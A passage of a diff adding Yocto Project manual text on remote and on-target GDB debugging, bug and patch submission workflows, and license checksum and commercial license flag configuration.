+      actual name you want to use.
+
+4. *Set up the* ``debugfs``\ *:*
+
+   Run the following commands to set up the ``debugfs``:
+   ::
+
+      $ mkdir debugfs
+      $ cd debugfs
+      $ tar xvfj build-dir/tmp-glibc/deploy/images/machine/image.rootfs.tar.bz2
+      $ tar xvfj build-dir/tmp-glibc/deploy/images/machine/image-dbg.rootfs.tar.bz2
+
+5. *Set up GDB:*
+
+   Install the SDK (if you built one) and then source the correct
+   environment file. Sourcing the environment file puts the SDK in your
+   ``PATH`` environment variable.
+
+   If you are using the build system, Gdb is located in
+   `build-dir`\ ``/tmp/sysroots/``\ `host`\ ``/usr/bin/``\ `architecture`\ ``/``\ `architecture`\ ``-gdb``
+
+6. *Boot the target:*
+
+   For information on how to run QEMU, see the `QEMU
+   Documentation <https://wiki.qemu.org/Documentation/GettingStartedDevelopers>`__.
+
+   .. note::
+
+      Be sure to verify that your host can access the target via TCP.
+
+7. *Debug a program:*
+
+   Debugging a program involves running gdbserver on the target and then
+   running Gdb on the host. The example in this step debugs ``gzip``:
+
+   .. code-block:: shell
+
+      root@qemux86:~# gdbserver localhost:1234 /bin/gzip —help
+
+   For
+   additional gdbserver options, see the `GDB Server
+   Documentation <https://www.gnu.org/software/gdb/documentation/>`__.
+
+   After running gdbserver on the target, you need to run Gdb on the
+   host and configure it and connect to the target. Use these commands:
+   ::
+
+      $ cd directory-holding-the-debugfs-directory
+      $ arch-gdb
+      (gdb) set sysroot debugfs
+      (gdb) set substitute-path /usr/src/debug debugfs/usr/src/debug
+      (gdb) target remote IP-of-target:1234
+
+   At this
+   point, everything should automatically load (i.e. matching binaries,
+   symbols and headers).
+
+   .. note::
+
+      The Gdb ``set`` commands in the previous example can be placed into the
+      users ``~/.gdbinit`` file. Upon starting, Gdb automatically runs whatever
+      commands are in that file.
+
+8. *Deploying without a full image rebuild:*
+
+   In many cases, during development you want a quick method to deploy a
+   new binary to the target and debug it, without waiting for a full
+   image build.
+
+   One approach to solving this situation is to just build the component
+   you want to debug. Once you have built the component, copy the
+   executable directly to both the target and the host ``debugfs``.
+
+   If the binary is processed through the debug splitting in
+   OpenEmbedded, you should also copy the debug items (i.e. ``.debug``
+   contents and corresponding ``/usr/src/debug`` files) from the work
+   directory. Here is an example:
+   ::
+
+      $ bitbake bash
+      $ bitbake -c devshell bash
+      $ cd ..
+      $ scp packages-split/bash/bin/bash target:/bin/bash
+      $ cp -a packages-split/bash-dbg/\* path/debugfs
+
+Debugging with the GNU Project Debugger (GDB) on the Target
+-----------------------------------------------------------
+
+The previous section addressed using GDB remotely for debugging
+purposes, which is the most usual case due to the inherent hardware
+limitations on many embedded devices. However, debugging in the target
+hardware itself is also possible with more powerful devices. This
+section describes what you need to do in order to support using GDB to
+debug on the target hardware.
+
+To support this kind of debugging, you need do the following:
+
+-  Ensure that GDB is on the target. You can do this by adding "gdb" to
+   :term:`IMAGE_INSTALL`:
+   ::
+
+      IMAGE_INSTALL_append = " gdb"
+
+   Alternatively, you can add "tools-debug" to :term:`IMAGE_FEATURES`:
+   ::
+
+      IMAGE_FEATURES_append = " tools-debug"
+
+-  Ensure that debug symbols are present. You can make sure these
+   symbols are present by installing ``-dbg``:
+   ::
+
+      IMAGE_INSTALL_append = "packagename-dbg"
+
+   Alternatively, you can do the following to include
+   all the debug symbols:
+   ::
+
+      IMAGE_FEATURES_append = " dbg-pkgs"
+
+.. note::
+
+   To improve the debug information accuracy, you can reduce the level
+   of optimization used by the compiler. For example, when adding the
+   following line to your ``local.conf`` file, you will reduce optimization
+   from :term:`FULL_OPTIMIZATION` of "-O2" to :term:`DEBUG_OPTIMIZATION`
+   of "-O -fno-omit-frame-pointer":
+   ::
+
+           DEBUG_BUILD = "1"
+
+   Consider that this will reduce the application's performance and is
+   recommended only for debugging purposes.
+
+.. _dev-other-debugging-others:
+
+Other Debugging Tips
+--------------------
+
+Here are some other tips that you might find useful:
+
+-  When adding new packages, it is worth watching for undesirable items
+   making their way into compiler command lines. For example, you do not
+   want references to local system files like ``/usr/lib/`` or
+   ``/usr/include/``.
+
+-  If you want to remove the ``psplash`` boot splashscreen, add
+   ``psplash=false`` to the kernel command line. Doing so prevents
+   ``psplash`` from loading and thus allows you to see the console. It
+   is also possible to switch out of the splashscreen by switching the
+   virtual console (e.g. Fn+Left or Fn+Right on a Zaurus).
+
+-  Removing :term:`TMPDIR` (usually
+   ``tmp/``, within the
+   :term:`Build Directory`) can often fix
+   temporary build issues. Removing ``TMPDIR`` is usually a relatively
+   cheap operation, because task output will be cached in
+   :term:`SSTATE_DIR` (usually
+   ``sstate-cache/``, which is also in the Build Directory).
+
+   .. note::
+
+      Removing ``TMPDIR`` might be a workaround rather than a fix.
+      Consequently, trying to determine the underlying cause of an issue before
+      removing the directory is a good idea.
+
+-  Understanding how a feature is used in practice within existing
+   recipes can be very helpful. It is recommended that you configure
+   some method that allows you to quickly search through files.
+
+   Using GNU Grep, you can use the following shell function to
+   recursively search through common recipe-related files, skipping
+   binary files, ``.git`` directories, and the Build Directory (assuming
+   its name starts with "build"):
+   ::
+
+      g() {
+          grep -Ir \
+               --exclude-dir=.git \
+               --exclude-dir='build*' \
+               --include='*.bb*' \
+               --include='*.inc*' \
+               --include='*.conf*' \
+               --include='*.py*' \
+               "$@"
+      }
+
+   Following are some usage examples:
+   ::
+
+      $ g FOO # Search recursively for "FOO"
+      $ g -i foo # Search recursively for "foo", ignoring case
+      $ g -w FOO # Search recursively for "FOO" as a word, ignoring e.g. "FOOBAR"
+
+   If figuring
+   out how some feature works requires a lot of searching, it might
+   indicate that the documentation should be extended or improved. In
+   such cases, consider filing a documentation bug using the Yocto
+   Project implementation of
+   :yocto_bugs:`Bugzilla <>`. For information on
+   how to submit a bug against the Yocto Project, see the Yocto Project
+   Bugzilla :yocto_wiki:`wiki page </wiki/Bugzilla_Configuration_and_Bug_Tracking>`
+   and the "`Submitting a Defect Against the Yocto
+   Project <#submitting-a-defect-against-the-yocto-project>`__" section.
+
+   .. note::
+
+      The manuals might not be the right place to document variables
+      that are purely internal and have a limited scope (e.g. internal
+      variables used to implement a single ``.bbclass`` file).
+
+Making Changes to the Yocto Project
+===================================
+
+Because the Yocto Project is an open-source, community-based project,
+you can effect changes to the project. This section presents procedures
+that show you how to submit a defect against the project and how to
+submit a change.
+
+Submitting a Defect Against the Yocto Project
+---------------------------------------------
+
+Use the Yocto Project implementation of
+`Bugzilla <https://www.bugzilla.org/about/>`__ to submit a defect (bug)
+against the Yocto Project. For additional information on this
+implementation of Bugzilla see the ":ref:`Yocto Project
+Bugzilla <resources-bugtracker>`" section in the
+Yocto Project Reference Manual. For more detail on any of the following
+steps, see the Yocto Project
+:yocto_wiki:`Bugzilla wiki page </wiki/Bugzilla_Configuration_and_Bug_Tracking>`.
+
+Use the following general steps to submit a bug:
+
+1.  Open the Yocto Project implementation of :yocto_bugs:`Bugzilla <>`.
+
+2.  Click "File a Bug" to enter a new bug.
+
+3.  Choose the appropriate "Classification", "Product", and "Component"
+    for which the bug was found. Bugs for the Yocto Project fall into
+    one of several classifications, which in turn break down into
+    several products and components. For example, for a bug against the
+    ``meta-intel`` layer, you would choose "Build System, Metadata &
+    Runtime", "BSPs", and "bsps-meta-intel", respectively.
+
+4.  Choose the "Version" of the Yocto Project for which you found the
+    bug (e.g. &DISTRO;).
+
+5.  Determine and select the "Severity" of the bug. The severity
+    indicates how the bug impacted your work.
+
+6.  Choose the "Hardware" that the bug impacts.
+
+7.  Choose the "Architecture" that the bug impacts.
+
+8.  Choose a "Documentation change" item for the bug. Fixing a bug might
+    or might not affect the Yocto Project documentation. If you are
+    unsure of the impact to the documentation, select "Don't Know".
+
+9.  Provide a brief "Summary" of the bug. Try to limit your summary to
+    just a line or two and be sure to capture the essence of the bug.
+
+10. Provide a detailed "Description" of the bug. You should provide as
+    much detail as you can about the context, behavior, output, and so
+    forth that surrounds the bug. You can even attach supporting files
+    for output from logs by using the "Add an attachment" button.
+
+11. Click the "Submit Bug" button submit the bug. A new Bugzilla number
+    is assigned to the bug and the defect is logged in the bug tracking
+    system.
+
+Once you file a bug, the bug is processed by the Yocto Project Bug
+Triage Team and further details concerning the bug are assigned (e.g.
+priority and owner). You are the "Submitter" of the bug and any further
+categorization, progress, or comments on the bug result in Bugzilla
+sending you an automated email concerning the particular change or
+progress to the bug.
+
+.. _how-to-submit-a-change:
+
+Submitting a Change to the Yocto Project
+----------------------------------------
+
+Contributions to the Yocto Project and OpenEmbedded are very welcome.
+Because the system is extremely configurable and flexible, we recognize
+that developers will want to extend, configure or optimize it for their
+specific uses.
+
+The Yocto Project uses a mailing list and a patch-based workflow that is
+similar to the Linux kernel but contains important differences. In
+general, a mailing list exists through which you can submit patches. You
+should send patches to the appropriate mailing list so that they can be
+reviewed and merged by the appropriate maintainer. The specific mailing
+list you need to use depends on the location of the code you are
+changing. Each component (e.g. layer) should have a ``README`` file that
+indicates where to send the changes and which process to follow.
+
+You can send the patch to the mailing list using whichever approach you
+feel comfortable with to generate the patch. Once sent, the patch is
+usually reviewed by the community at large. If somebody has concerns
+with the patch, they will usually voice their concern over the mailing
+list. If a patch does not receive any negative reviews, the maintainer
+of the affected layer typically takes the patch, tests it, and then
+based on successful testing, merges the patch.
+
+The "poky" repository, which is the Yocto Project's reference build
+environment, is a hybrid repository that contains several individual
+pieces (e.g. BitBake, Metadata, documentation, and so forth) built using
+the combo-layer tool. The upstream location used for submitting changes
+varies by component:
+
+-  *Core Metadata:* Send your patch to the
+   :oe_lists:`openembedded-core </g/openembedded-core>`
+   mailing list. For example, a change to anything under the ``meta`` or
+   ``scripts`` directories should be sent to this mailing list.
+
+-  *BitBake:* For changes to BitBake (i.e. anything under the
+   ``bitbake`` directory), send your patch to the
+   :oe_lists:`bitbake-devel </g/bitbake-devel>`
+   mailing list.
+
+-  *"meta-\*" trees:* These trees contain Metadata. Use the
+   :yocto_lists:`poky </g/poky>` mailing list.
+
+-  *Documentation*: For changes to the Yocto Project documentation, use the
+   :yocto_lists:`docs </g/docs>` mailing list.
+
+For changes to other layers hosted in the Yocto Project source
+repositories (i.e. ``yoctoproject.org``) and tools use the
+:yocto_lists:`Yocto Project </g/yocto/>` general mailing list.
+
+.. note::
+
+   Sometimes a layer's documentation specifies to use a particular
+   mailing list. If so, use that list.
+
+For additional recipes that do not fit into the core Metadata, you
+should determine which layer the recipe should go into and submit the
+change in the manner recommended by the documentation (e.g. the
+``README`` file) supplied with the layer. If in doubt, please ask on the
+Yocto general mailing list or on the openembedded-devel mailing list.
+
+You can also push a change upstream and request a maintainer to pull the
+change into the component's upstream repository. You do this by pushing
+to a contribution repository that is upstream. See the ":ref:`gs-git-workflows-and-the-yocto-project`"
+section in the Yocto Project Overview and Concepts Manual for additional
+concepts on working in the Yocto Project development environment.
+
+Two commonly used testing repositories exist for OpenEmbedded-Core:
+
+-  *"ross/mut" branch:* The "mut" (master-under-test) tree exists in the
+   ``poky-contrib`` repository in the
+   :yocto_git:`Yocto Project source repositories <>`.
+
+-  *"master-next" branch:* This branch is part of the main "poky"
+   repository in the Yocto Project source repositories.
+
+Maintainers use these branches to test submissions prior to merging
+patches. Thus, you can get an idea of the status of a patch based on
+whether the patch has been merged into one of these branches.
+
+.. note::
+
+   This system is imperfect and changes can sometimes get lost in the
+   flow. Asking about the status of a patch or change is reasonable if
+   the change has been idle for a while with no feedback. The Yocto
+   Project does have plans to use
+   `Patchwork <https://en.wikipedia.org/wiki/Patchwork_(software)>`__
+   to track the status of patches and also to automatically preview
+   patches.
+
+The following sections provide procedures for submitting a change.
+
+.. _pushing-a-change-upstream:
+
+Using Scripts to Push a Change Upstream and Request a Pull
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Follow this procedure to push a change to an upstream "contrib" Git
+repository:
+
+.. note::
+
+   You can find general Git information on how to push a change upstream
+   in the
+   `Git Community Book <https://git-scm.com/book/en/v2/Distributed-Git-Distributed-Workflows>`__.
+
+1. *Make Your Changes Locally:* Make your changes in your local Git
+   repository. You should make small, controlled, isolated changes.
+   Keeping changes small and isolated aids review, makes
+   merging/rebasing easier and keeps the change history clean should
+   anyone need to refer to it in future.
+
+2. *Stage Your Changes:* Stage your changes by using the ``git add``
+   command on each file you changed.
+
+3. *Commit Your Changes:* Commit the change by using the ``git commit``
+   command. Make sure your commit information follows standards by
+   following these accepted conventions:
+
+   -  Be sure to include a "Signed-off-by:" line in the same style as
+      required by the Linux kernel. Adding this line signifies that you,
+      the submitter, have agreed to the Developer's Certificate of
+      Origin 1.1 as follows:
+
+      .. code-block:: none
+
+         Developer's Certificate of Origin 1.1
+
+         By making a contribution to this project, I certify that:
+
+         (a) The contribution was created in whole or in part by me and I
+             have the right to submit it under the open source license
+             indicated in the file; or
+
+         (b) The contribution is based upon previous work that, to the best
+             of my knowledge, is covered under an appropriate open source
+             license and I have the right under that license to submit that
+             work with modifications, whether created in whole or in part
+             by me, under the same open source license (unless I am
+             permitted to submit under a different license), as indicated
+             in the file; or
+
+         (c) The contribution was provided directly to me by some other
+             person who certified (a), (b) or (c) and I have not modified
+             it.
+
+         (d) I understand and agree that this project and the contribution
+             are public and that a record of the contribution (including all
+             personal information I submit with it, including my sign-off) is
+             maintained indefinitely and may be redistributed consistent with
+             this project or the open source license(s) involved.
+
+   -  Provide a single-line summary of the change and, if more
+      explanation is needed, provide more detail in the body of the
+      commit. This summary is typically viewable in the "shortlist" of
+      changes. Thus, providing something short and descriptive that
+      gives the reader a summary of the change is useful when viewing a
+      list of many commits. You should prefix this short description
+      with the recipe name (if changing a recipe), or else with the
+      short form path to the file being changed.
+
+   -  For the body of the commit message, provide detailed information
+      that describes what you changed, why you made the change, and the
+      approach you used. It might also be helpful if you mention how you
+      tested the change. Provide as much detail as you can in the body
+      of the commit message.
+
+      .. note::
+
+         You do not need to provide a more detailed explanation of a
+         change if the change is minor to the point of the single line
+         summary providing all the information.
+
+   -  If the change addresses a specific bug or issue that is associated
+      with a bug-tracking ID, include a reference to that ID in your
+      detailed description. For example, the Yocto Project uses a
+      specific convention for bug references - any commit that addresses
+      a specific bug should use the following form for the detailed
+      description. Be sure to use the actual bug-tracking ID from
+      Bugzilla for bug-id:
+      ::
+
+         Fixes [YOCTO #bug-id]
+
+         detailed description of change
+
+4. *Push Your Commits to a "Contrib" Upstream:* If you have arranged for
+   permissions to push to an upstream contrib repository, push the
+   change to that repository:
+   ::
+
+      $ git push upstream_remote_repo local_branch_name
+
+   For example, suppose you have permissions to push
+   into the upstream ``meta-intel-contrib`` repository and you are
+   working in a local branch named `your_name`\ ``/README``. The following
+   command pushes your local commits to the ``meta-intel-contrib``
+   upstream repository and puts the commit in a branch named
+   `your_name`\ ``/README``:
+   ::
+
+      $ git push meta-intel-contrib your_name/README
+
+5. *Determine Who to Notify:* Determine the maintainer or the mailing
+   list that you need to notify for the change.
+
+   Before submitting any change, you need to be sure who the maintainer
+   is or what mailing list that you need to notify. Use either these
+   methods to find out:
+
+   -  *Maintenance File:* Examine the ``maintainers.inc`` file, which is
+      located in the :term:`Source Directory` at
+      ``meta/conf/distro/include``, to see who is responsible for code.
+
+   -  *Search by File:* Using :ref:`overview-manual/overview-manual-development-environment:git`, you can
+      enter the following command to bring up a short list of all
+      commits against a specific file:
+      ::
+
+         git shortlog -- filename
+
+      Just provide the name of the file for which you are interested. The
+      information returned is not ordered by history but does include a
+      list of everyone who has committed grouped by name. From the list,
+      you can see who is responsible for the bulk of the changes against
+      the file.
+
+   -  *Examine the List of Mailing Lists:* For a list of the Yocto
+      Project and related mailing lists, see the ":ref:`Mailing
+      lists <resources-mailinglist>`" section in
+      the Yocto Project Reference Manual.
+
+6. *Make a Pull Request:* Notify the maintainer or the mailing list that
+   you have pushed a change by making a pull request.
+
+   The Yocto Project provides two scripts that conveniently let you
+   generate and send pull requests to the Yocto Project. These scripts
+   are ``create-pull-request`` and ``send-pull-request``. You can find
+   these scripts in the ``scripts`` directory within the
+   :term:`Source Directory` (e.g.
+   ``~/poky/scripts``).
+
+   Using these scripts correctly formats the requests without
+   introducing any whitespace or HTML formatting. The maintainer that
+   receives your patches either directly or through the mailing list
+   needs to be able to save and apply them directly from your emails.
+   Using these scripts is the preferred method for sending patches.
+
+   First, create the pull request. For example, the following command
+   runs the script, specifies the upstream repository in the contrib
+   directory into which you pushed the change, and provides a subject
+   line in the created patch files:
+   ::
+
+      $ ~/poky/scripts/create-pull-request -u meta-intel-contrib -s "Updated Manual Section Reference in README"
+
+   Running this script forms ``*.patch`` files in a folder named
+   ``pull-``\ `PID` in the current directory. One of the patch files is a
+   cover letter.
+
+   Before running the ``send-pull-request`` script, you must edit the
+   cover letter patch to insert information about your change. After
+   editing the cover letter, send the pull request. For example, the
+   following command runs the script and specifies the patch directory
+   and email address. In this example, the email address is a mailing
+   list:
+   ::
+
+      $ ~/poky/scripts/send-pull-request -p ~/meta-intel/pull-10565 -t meta-intel@yoctoproject.org
+
+   You need to follow the prompts as the script is interactive.
+
+   .. note::
+
+      For help on using these scripts, simply provide the ``-h``
+      argument as follows:
+      ::
+
+              $ poky/scripts/create-pull-request -h
+              $ poky/scripts/send-pull-request -h
+
+
+.. _submitting-a-patch:
+
+Using Email to Submit a Patch
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+You can submit patches without using the ``create-pull-request`` and
+``send-pull-request`` scripts described in the previous section.
+However, keep in mind, the preferred method is to use the scripts.
+
+Depending on the components changed, you need to submit the email to a
+specific mailing list. For some guidance on which mailing list to use,
+see the `list <#figuring-out-the-mailing-list-to-use>`__ at the
+beginning of this section. For a description of all the available
+mailing lists, see the ":ref:`Mailing Lists <resources-mailinglist>`" section in the
+Yocto Project Reference Manual.
+
+Here is the general procedure on how to submit a patch through email
+without using the scripts:
+
+1. *Make Your Changes Locally:* Make your changes in your local Git
+   repository. You should make small, controlled, isolated changes.
+   Keeping changes small and isolated aids review, makes
+   merging/rebasing easier and keeps the change history clean should
+   anyone need to refer to it in future.
+
+2. *Stage Your Changes:* Stage your changes by using the ``git add``
+   command on each file you changed.
+
+3. *Commit Your Changes:* Commit the change by using the
+   ``git commit --signoff`` command. Using the ``--signoff`` option
+   identifies you as the person making the change and also satisfies the
+   Developer's Certificate of Origin (DCO) shown earlier.
+
+   When you form a commit, you must follow certain standards established
+   by the Yocto Project development team. See :ref:`Step 3
+   <dev-manual/dev-manual-common-tasks:using scripts to push a change upstream and request a pull>`
+   in the previous section for information on how to provide commit information
+   that meets Yocto Project commit message standards.
+
+4. *Format the Commit:* Format the commit into an email message. To
+   format commits, use the ``git format-patch`` command. When you
+   provide the command, you must include a revision list or a number of
+   patches as part of the command. For example, either of these two
+   commands takes your most recent single commit and formats it as an
+   email message in the current directory:
+   ::
+
+      $ git format-patch -1
+
+   or ::
+
+      $ git format-patch HEAD~
+
+   After the command is run, the current directory contains a numbered
+   ``.patch`` file for the commit.
+
+   If you provide several commits as part of the command, the
+   ``git format-patch`` command produces a series of numbered files in
+   the current directory – one for each commit. If you have more than
+   one patch, you should also use the ``--cover`` option with the
+   command, which generates a cover letter as the first "patch" in the
+   series. You can then edit the cover letter to provide a description
+   for the series of patches. For information on the
+   ``git format-patch`` command, see ``GIT_FORMAT_PATCH(1)`` displayed
+   using the ``man git-format-patch`` command.
+
+   .. note::
+
+      If you are or will be a frequent contributor to the Yocto Project
+      or to OpenEmbedded, you might consider requesting a contrib area
+      and the necessary associated rights.
+
+5. *Import the Files Into Your Mail Client:* Import the files into your
+   mail client by using the ``git send-email`` command.
+
+   .. note::
+
+      In order to use ``git send-email``, you must have the proper Git packages
+      installed on your host.
+      For Ubuntu, Debian, and Fedora the package is ``git-email``.
+
+   The ``git send-email`` command sends email by using a local or remote
+   Mail Transport Agent (MTA) such as ``msmtp``, ``sendmail``, or
+   through a direct ``smtp`` configuration in your Git ``~/.gitconfig``
+   file. If you are submitting patches through email only, it is very
+   important that you submit them without any whitespace or HTML
+   formatting that either you or your mailer introduces. The maintainer
+   that receives your patches needs to be able to save and apply them
+   directly from your emails. A good way to verify that what you are
+   sending will be applicable by the maintainer is to do a dry run and
+   send them to yourself and then save and apply them as the maintainer
+   would.
+
+   The ``git send-email`` command is the preferred method for sending
+   your patches using email since there is no risk of compromising
+   whitespace in the body of the message, which can occur when you use
+   your own mail client. The command also has several options that let
+   you specify recipients and perform further editing of the email
+   message. For information on how to use the ``git send-email``
+   command, see ``GIT-SEND-EMAIL(1)`` displayed using the
+   ``man git-send-email`` command.
+
+Working With Licenses
+=====================
+
+As mentioned in the ":ref:`overview-manual/overview-manual-development-environment:licensing`"
+section in the Yocto Project Overview and Concepts Manual, open source
+projects are open to the public and they consequently have different
+licensing structures in place. This section describes the mechanism by
+which the :term:`OpenEmbedded Build System`
+tracks changes to
+licensing text and covers how to maintain open source license compliance
+during your project's lifecycle. The section also describes how to
+enable commercially licensed recipes, which by default are disabled.
+
+.. _usingpoky-configuring-LIC_FILES_CHKSUM:
+
+Tracking License Changes
+------------------------
+
+The license of an upstream project might change in the future. In order
+to prevent these changes going unnoticed, the
+:term:`LIC_FILES_CHKSUM`
+variable tracks changes to the license text. The checksums are validated
+at the end of the configure step, and if the checksums do not match, the
+build will fail.
+
+.. _usingpoky-specifying-LIC_FILES_CHKSUM:
+
+Specifying the ``LIC_FILES_CHKSUM`` Variable
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+The ``LIC_FILES_CHKSUM`` variable contains checksums of the license text
+in the source code for the recipe. Following is an example of how to
+specify ``LIC_FILES_CHKSUM``:
+::
+
+   LIC_FILES_CHKSUM = "file://COPYING;md5=xxxx \
+                       file://licfile1.txt;beginline=5;endline=29;md5=yyyy \
+                       file://licfile2.txt;endline=50;md5=zzzz \
+                       ..."
+
+.. note::
+
+   -  When using "beginline" and "endline", realize that line numbering
+      begins with one and not zero. Also, the included lines are
+      inclusive (i.e. lines five through and including 29 in the
+      previous example for ``licfile1.txt``).
+
+   -  When a license check fails, the selected license text is included
+      as part of the QA message. Using this output, you can determine
+      the exact start and finish for the needed license text.
+
+The build system uses the :term:`S`
+variable as the default directory when searching files listed in
+``LIC_FILES_CHKSUM``. The previous example employs the default
+directory.
+
+Consider this next example:
+::
+
+   LIC_FILES_CHKSUM = "file://src/ls.c;beginline=5;endline=16;\
+                                       md5=bb14ed3c4cda583abc85401304b5cd4e"
+   LIC_FILES_CHKSUM = "file://${WORKDIR}/license.html;md5=5c94767cedb5d6987c902ac850ded2c6"
+
+The first line locates a file in ``${S}/src/ls.c`` and isolates lines
+five through 16 as license text. The second line refers to a file in
+:term:`WORKDIR`.
+
+Note that ``LIC_FILES_CHKSUM`` variable is mandatory for all recipes,
+unless the ``LICENSE`` variable is set to "CLOSED".
+
+.. _usingpoky-LIC_FILES_CHKSUM-explanation-of-syntax:
+
+Explanation of Syntax
+~~~~~~~~~~~~~~~~~~~~~
+
+As mentioned in the previous section, the ``LIC_FILES_CHKSUM`` variable
+lists all the important files that contain the license text for the
+source code. It is possible to specify a checksum for an entire file, or
+a specific section of a file (specified by beginning and ending line
+numbers with the "beginline" and "endline" parameters, respectively).
+The latter is useful for source files with a license notice header,
+README documents, and so forth. If you do not use the "beginline"
+parameter, then it is assumed that the text begins on the first line of
+the file. Similarly, if you do not use the "endline" parameter, it is
+assumed that the license text ends with the last line of the file.
+
+The "md5" parameter stores the md5 checksum of the license text. If the
+license text changes in any way as compared to this parameter then a
+mismatch occurs. This mismatch triggers a build failure and notifies the
+developer. Notification allows the developer to review and address the
+license text changes. Also note that if a mismatch occurs during the
+build, the correct md5 checksum is placed in the build log and can be
+easily copied to the recipe.
+
+There is no limit to how many files you can specify using the
+``LIC_FILES_CHKSUM`` variable. Generally, however, every project
+requires a few specifications for license tracking. Many projects have a
+"COPYING" file that stores the license information for all the source
+code files. This practice allows you to just track the "COPYING" file as
+long as it is kept up to date.
+
+.. note::
+
+   -  If you specify an empty or invalid "md5" parameter,
+      :term:`BitBake` returns an md5
+      mis-match error and displays the correct "md5" parameter value
+      during the build. The correct parameter is also captured in the
+      build log.
+
+   -  If the whole file contains only license text, you do not need to
+      use the "beginline" and "endline" parameters.
+
+Enabling Commercially Licensed Recipes
+--------------------------------------
+
+By default, the OpenEmbedded build system disables components that have
+commercial or other special licensing requirements. Such requirements
+are defined on a recipe-by-recipe basis through the
+:term:`LICENSE_FLAGS` variable
+definition in the affected recipe. For instance, the
+``poky/meta/recipes-multimedia/gstreamer/gst-plugins-ugly`` recipe
+contains the following statement:
+::
+
+   LICENSE_FLAGS = "commercial"
+
+Here is a
+slightly more complicated example that contains both an explicit recipe
+name and version (after variable expansion):
+::
+
+   LICENSE_FLAGS = "license_${PN}_${PV}"
+
+In order for a component restricted by a
+``LICENSE_FLAGS`` definition to be enabled and included in an image, it
+needs to have a matching entry in the global
+:term:`LICENSE_FLAGS_WHITELIST`
+variable, which is a variable typically defined in your ``local.conf``
+file. For example, to enable the
+``poky/meta/recipes-multimedia/gstreamer/gst-plugins-ugly`` package, you
+could add either the string "commercial_gst-plugins-ugly" or the more
+general string "commercial" to ``LICENSE_FLAGS_WHITELIST``. See the
+"`License Flag Matching <#license-flag-matching>`__" section for a full
+explanation of how ``LICENSE_FLAGS`` matching works. Here is the
+example:
+::
+
+   LICENSE_FLAGS_WHITELIST = "commercial_gst-plugins-ugly"
+
+Likewise, to additionally enable the package built from the recipe
+containing ``LICENSE_FLAGS = "license_${PN}_${PV}"``, and assuming that
+the actual recipe name was ``emgd_1.10.bb``, the following string would
+enable that package as well as the original ``gst-plugins-ugly``
+package:
+::
+
+   LICENSE_FLAGS_WHITELIST = "commercial_gst-plugins-ugly license_emgd_1.10"
+
+As a convenience, you do not need to specify the
+complete license string in the whitelist for every package. You can use
+an abbreviated form, which consists of just the first portion or
+portions of the license string before the initial underscore character
+or characters. A partial string will match any license that contains the
+given string as the first portion of its license. For example, the
+following whitelist string will also match both of the packages
+previously mentioned as well as any other packages that have licenses
+starting with "commercial" or "license".
+::
+
+   LICENSE_FLAGS_WHITELIST = "commercial license"
+
+License Flag Matching
+~~~~~~~~~~~~~~~~~~~~~
+
+License flag matching allows you to control what recipes the
+OpenEmbedded build system includes in the build. Fundamentally, the
+build system attempts to match ``LICENSE_FLAGS`` strings found in
+recipes against ``LICENSE_FLAGS_WHITELIST`` strings found in the
+whitelist. A match causes the build system to include a recipe in the
+build, while failure to find a match causes the build system to exclude
+a recipe.
+
+In general, license flag matching is simple. However, understanding some
+concepts will help you correctly and effectively use matching.
+
+Before a flag defined by a particular recipe is tested against the
+contents of the whitelist, the expanded string ``_${PN}`` is appended to
+the flag. This expansion makes each ``LICENSE_FLAGS`` value
+recipe-specific. After expansion, the string is then matched against the
+whitelist. Thus, specifying ``LICENSE_FLAGS = "commercial"`` in recipe
+"foo", for example, results in the string ``"commercial_foo"``. And, to
+create a match, that string must appear in the whitelist.
+
+Judicious use of the ``LICENSE_FLAGS`` strings and the contents of the
+``LICENSE_FLAGS_WHITELIST`` variable allows you a lot of flexibility for
+including or excluding recipes based on licensing. For example, you can
+broaden the matching capabilities by using license flags string subsets
+in the whitelist.
+
+.. note::
+
+   When using a string subset, be sure to use the part of the expanded
+   string that precedes the appended underscore character (e.g.
+   ``usethispart_1.3``, ``usethispart_1.4``, and so forth).
+
+For example, simply specifying the string "commercial" in the whitelist
+matches any expanded ``LICENSE_FLAGS`` definition that starts with the
+string "commercial" such as "commercial_foo" and "commercial_bar", which
+are the strings the build system automatically generates for
+hypothetical recipes named "foo" and "bar" assuming those recipes simply
+specify the following:
+::
+
+   LICENSE_FLAGS = "commercial"
+
+Thus, you can choose
+to exhaustively enumerate each license flag in the whitelist and allow
+only specific recipes into the image, or you can use a string subset
+that causes a broader range of matches to allow a range of recipes into
+the image.
+
+This scheme works even if the ``LICENSE_FLAGS`` string already has
+``_${PN}`` appended. For example, the build system turns the license
+flag "commercial_1.2_foo" into "commercial_1.2_foo_foo" and would match
+both the general "commercial" and the specific "commercial_1.2_foo"
+strings found in the whitelist, as expected.
+
+Here are some other scenarios:
+
+-  You can specify a versioned string in the recipe such as
+   "commercial_foo_1.2" in a "foo" recipe. The build system expands this
+   string to "commercial_foo_1.2_foo". Combine this license flag with a
+   whitelist that has the string "commercial" and you match the flag
+   along with any other flag that starts with the string "commercial".
+
+-  Under the same circumstances, you can use "commercial_foo" in the
+   whitelist and the build system not only matches "commercial_foo_1.2"
+   but also matches any license flag with the string "commercial_foo",
+   regardless of the version.
+
+-  You can be very specific and use both the package and version parts
+   in the whitelist (e.g. "commercial_foo_1.2") to specifically match a
+   versioned recipe.
+
+Other Variables Related to Commercial Licenses
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Other helpful variables related to commercial license handling exist and
+are defined in the
+``poky/meta/conf/distro/include/default-distrovars.inc`` file:
+::
+
+   COMMERCIAL_AUDIO_PLUGINS ?= ""
+   COMMERCIAL_VIDEO_PLUGINS ?= ""
+
+If you
+want to enable these components, you can do so by making sure you have
+statements similar to the following in your ``local.conf`` configuration
+file:
+::
+
+   COMMERCIAL_AUDIO_PLUGINS = "gst-plugins-ugly-mad \
+       gst-plugins-ugly-mpegaudioparse"
+   COMMERCIAL_VIDEO_PLUGINS = "gst-plugins-ugly-mpeg2dec \
+       gst-plugins-ugly-mpegstream gst-plugins-bad-mpegvideoparse"
+   LICENSE_FLAGS_WHITELIST = "commercial_gst-plugins-ugly commercial_gst-plugins-bad commercial_qmmp"
+
+
+Of course, you could also create a matching whitelist for those
+components using the more general "commercial" in the whitelist, but
+that would also enable all the other packages with ``LICENSE_FLAGS``
+containing "commercial", which you may or may not want:
+::
+
